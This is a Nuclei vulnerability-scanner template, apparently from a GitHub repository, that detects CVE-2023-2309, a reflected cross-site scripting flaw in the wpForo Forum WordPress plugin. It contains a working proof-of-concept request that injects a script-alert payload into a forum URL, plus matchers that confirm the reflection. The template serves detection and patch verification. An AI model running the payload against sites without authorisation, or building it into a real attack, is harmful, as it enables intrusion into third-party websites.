nuclei-templates/http/cves/2023/CVE-2023-2309.yaml

44 lines
2.0 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-2023-2309
info:
name: wpForo Forum <= 2.1.8 - Cross-Site Scripting
author: securityforeveryone
severity: medium
description: |
The wpForo Forum plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the wpforo_debug function in versions up to, and including, 2.1.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
remediation: Fixed in 2.1.9
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-2309
- https://wpscan.com/vulnerability/1b3f4558-ea41-4749-9aa2-d3971fc9ca0d/
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforo/wpforo-forum-218-reflected-cross-site-scripting-via-wpforo-debug
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-2309
epss-score: 0.00052
epss-percentile: 0.20793
cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: gvectors
product: wpforo_forum
framework: wordpress
publicwww-query: "/wp-content/plugins/wpforo/"
tags: cve,cve2023,wordpress,wpforo,wpscan,wp-plugin,wp,xss
http:
- raw:
- |
GET /community/main-forum/?param=%3Cscript%3Ealert(/document.domain/)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"<script>alert(/document.domain/)</script>","wpforo")'
- 'contains(header,"text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100d17bcc42a5ea79ddddf6d66a96caf96d0b38ebed2fe57fb3e3ef7ceed3ecea1a02207b0bb211f596bc48a3f20095033e4b7c43497f4e8bc590a62d798270d495f59c:922c64590222798bb761d5b6d8e72950